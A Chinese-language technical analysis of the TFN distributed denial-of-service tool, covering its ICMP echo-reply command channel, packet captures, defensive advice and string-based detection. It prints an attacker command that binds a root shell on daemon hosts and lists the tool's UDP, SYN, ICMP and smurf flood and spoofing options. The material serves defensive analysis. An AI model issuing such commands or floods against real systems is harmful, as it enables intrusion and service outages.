本文是对德国著名黑客Mixter编写的分布式拒绝服务攻击工具——"Tribe Flood Network(TFN)"的技术性分析。TFN与另一个分布式拒绝服务攻击工具"Trinoo"相似,都在互联网的大量Unix系统中开发和测试。
TFN客户端通过ICMP_ECHOREPLY包而不是ICMP_ECHO包向TFN守护程序发送命令。这能够防止守护程序所在系统的内核发送ICMP_ECHOREPLY包。而TFN守护程序则在需要时也通过ICMP_ECHOREPLY包响应TFN客户端。TFN使用的ICMP包与正常ICMP包的不同之处在于它发送的命令参数及响应。
在TFN使用的ICMP_ECHOREPLY包的id域中包含了"命令"(16位二进制值),而在数据段中则是ASCII明文方式的任何参数。
以下是某个攻击者执行命令以启动在端口12345上监听的shell:
----------------------------------------------------------------------------
# ./tfn iplist 4 12345
[tribe flood network] (c) 1999 by Mixter
[request: bind shell to port 12345]
192.168.0.1: shell bound to port 12345
#
----------------------------------------------------------------------------
以下是使用"sniffit"监听到的网络通讯:
---------------------------------------------------------------------------- 192.168.0.1
ICMP type: Echo reply
.. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
.. . .. . .. . .. . 00 . 00 . 64 d D1 . 01 . C8 . 00 . 00 . 31 1 32 2 33 3 34 4
35 5 00 .
10.0.0.1
ICMP type: Echo reply
.. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .
.. . .. . .. . .. . 00 . 00 . 6C l AE . 00 . 7B { 00 . 00 . 73 s 68 h 65 e 6C l
6C l 20 62 b 6F o 75 u 6E n 64 d 20 74 t 6F o 20 70 p 6F o 72 r 74 t 20
31 1 32 2 33 3 34 4 35 5 0A . 00 .
----------------------------------------------------------------------------
以下是使用"tcpdump"监听到的网络通讯:
----------------------------------------------------------------------------
# tcpdump -lnx -s 1518 icmp
tcpdump: listening on eth0 192.168.0.1: icmp: echo reply
.... .... .... .... .... .... .... ....
.... .... 0000 64d1 01c8 0000 3132 3334
3500 10.0.0.1: icmp: echo reply
.... .... .... .... .... .... .... ....
.... .... 0000 6cae 007b 0000 7368 656c
6c20 626f 756e 6420 746f 2070 6f72 7420
3132 3334 350a 00
----------------------------------------------------------------------------
以下是"tcpdump"和"tcpshow"结合所监听到的内容:
----------------------------------------------------------------------------
Packet 1
ICMP Header
Type: echo-reply
Checksum: 0x64D1
Id: 0x01C8
Sequence: 0x0000
ICMP Data
12345
-----------------------------------------------------------------
Packet 2
ICMP Header
Type: echo-reply
Checksum: 0x6CAE
Id: 0x007B
Sequence: 0x0000
ICMP Data
shell bound to port 12345
----------------------------------------------------------------------------
能够看到,TFN客户端利用id字段包含命令0x01C8,序列号为0x0000(总是为0),还包含了指定的端口号为"12345",都发送到TFN守护程序端。
TFN守护程序回送给TFN客户端的内容包括id字段中的响应命令(0x007B),序列号为0x0000,和字符串"shell bound to port 12345\n"。这个字符串将和TFN守护程序的IP地址一起显示到TFN客户端的shell中。
防 御
--------
因为这个工具利用ICMP_ECHOREPLY包进行通讯,除非修改使用ICMP协议的程序,否则很难(但不是不可能)阻止它。Phrack的建议是:
最可靠的方法是禁止所有进入网络的ICMP_ECHO和ICMP_ECHOREPLY通讯。
简单地说,分辨ICMP_ECHO和ICMP_ECHOREPLY包是否正常不是一件容易的事情,特别对于大型网络。
缺陷及弱点
----------
如果源代码未必修改,可以通过搜索程序二进制代码中的字符串查找TFN客户端程序和TFN守护程序:
------------------------------------------------------------------------------
# strings - td
. . .
%d.%d.%d.%d
/bin/sh
tfn-daemon
already %s flooding
multiple targets
ICMP flood: %s
tfn-child
SMURF (target@bcast@...): %s
UDP flood: %s
SYN flood: port %d, multiple targets
SYN flood: port %d, %s
ready - size: %d spoof: %d
%s flood terminated
packet size: %d bytes
spoof mask: *.*.*.* (%s)
spoof mask: 1.*.*.* (%s)
spoof mask: 1.1.*.* (%s)
spoof mask: 1.1.1.* (%s)
spoof test: %s
shell bound to port %s
. . .
[0;35m[tribe flood network]
(c) 1999 by
[5mMixter
ICMP
SMURF
. . .
# strings - tfn
. . .
%d.%d.%d.%d
ERROR reading IP list
[1;37m
[request: change packet size]
[request: change spoofmask]
[request: stop and display status]
[request: udp flood %s]
[request: syn flood [port: %s] %s]
[request: icmp flood %s]
[request: bind shell to port %s]
[request: smurf (target@bcast@...) %s]
[0;0m
[0m%s:
[0;31m
[0;34mtimeout
[1;34m
usage: %s [ip] [port]
contains a list of numerical hosts that are ready to flood
-1 for spoofmask type (specify 0-3), -2 for packet size,
is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp,
4 to bind a rootshell (specify port)
5 to smurf, first ip is target, further ips are broadcasts
[ip] target ip[s], separated by %s if more than one
[port] must be given for a syn flood, 0 = RANDOM
skipping
[0;35m[tribe flood network]
(c) 1999 by
[5mMixter
. . .
------------------------------------------------------------------------------